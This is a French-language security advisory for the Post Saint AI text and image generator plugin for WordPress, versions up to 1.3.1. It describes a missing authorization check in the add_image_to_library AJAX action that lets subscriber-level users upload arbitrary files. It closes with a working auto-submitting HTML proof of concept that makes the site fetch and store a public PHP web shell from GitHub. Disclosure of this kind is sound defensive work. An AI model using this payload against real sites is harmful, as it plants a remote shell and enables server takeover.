
Post Saint: ChatGPT, GPT4, DALL-E, Stable Diffusion, Pexels, Dezgo Générateur IA de texte et d'images <= 1.3.1 - Autorisation manquante permettant à un utilisateur authentifié (Abonné+) de téléverser arbitrairement des fichiers
Post Saint : ChatGPT, GPT4, DALL-E, Stable Diffusion, Pexels, Dezgo AI Text & Image Generator <= 1.3.1 - Autorisation manquante permettant le téléversement arbitraire de fichiers par des utilisateurs authentifiés (Abonné+)
Le plugin Post Saint : ChatGPT, GPT4, DALL-E, Stable Diffusion, Pexels, Dezgo AI Text & Image Generator pour WordPress est vulnérable au téléversement arbitraire de fichiers en raison d'une absence de vérification des capacités et de validation du type de fichier sur la fonction d'action AJAX add_image_to_library dans toutes les versions jusqu'à la 1.3.1 incluse. Cela permet à des attaquants authentifiés, avec au moins un accès de niveau abonné, de téléverser des fichiers arbitraires rendant possible l'exécution de code à distance.
<html>
<body>
<form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="add_image_to_library" />
<input type="hidden" name="image_url" value="https://raw.githubusercontent.com/flozz/p0wny-shell/refs/heads/master/shell.php" />
<input type="hidden" name="image_prompt" value="say hello" />
<input type="hidden" name="insert_prompt_media_library_fields" value="caption_description" />
<input type="hidden" name="image_generator" value="pexels" />
<input type="hidden" name="log_id" value="1667" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>